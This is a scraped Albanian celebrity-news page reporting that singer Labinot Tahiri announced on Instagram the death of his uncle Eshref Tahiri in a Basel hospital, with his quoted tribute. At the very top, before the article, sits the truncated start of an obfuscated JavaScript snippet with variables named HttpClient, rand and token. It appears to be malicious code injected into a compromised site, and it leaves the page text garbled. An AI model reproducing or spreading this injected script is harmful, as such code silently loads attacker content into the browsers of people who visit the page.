;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Familja e Labinot Tahirit në zi!

By

Sot, me anë të një postimi në llogarinë e tij në Instagram, Labinot Tahiri njoftoi se ka vdekur një familjar i tij.

Këngëtari ferizajas shkroi në Instagram duke thënë se ishte xhaxhai i tij i cili u nda nga jeta.

Ai ndërroi jetë në moshën 63 vjecare ndërsa kujdesin mjekësor po e merrte në Basel të Zvicrës.

“Sot , ndërroi jetë , vëllau i babës ( axha im) Eshref Tahiri!

Axhë i dashur, u prehësh ne paqe!
Shpirti yt i bardhë, ndriqoftë edhe në botën tjetër!

Zoti të shpërbleftë me Parajsë🕊o njeri i mirë🙏🏻

Eshref Raif Tahiri, nga Ferizaj, 63 vjeq,
vdiq, sot , atje në spitalin e Bazelit-Zvicër!

Axha, si shumë gurbetqarë emigroi i ri para vitit 1990!
Atje punoi me mund e shpirt sa për ti ndihmuar familjet tona në Ferizaj!

Sa herë e kujtojë rininë time , me dalin ata familjarë se bashku me Axhën Eshref- ( AMIGA) , kështu e quanim ne fëmijët, ku me dashuri i numronim ditet e tyre që po vijnë në pushime! Ah sa me gëzime tē mdha ishin ato ditë, javë apo kohera , ku me plot dashuri i tregonim gjithë lagjes se po vijnë;. familjet tona nga gurbeti…qe besa edhe kur vinte ndonje kojshi e që ishte në gurbet u gëzonte e gjithë lagjeja”, shkroi ndër të tjerash këngëtari. /Prive.al

Artikuj të ngjashëm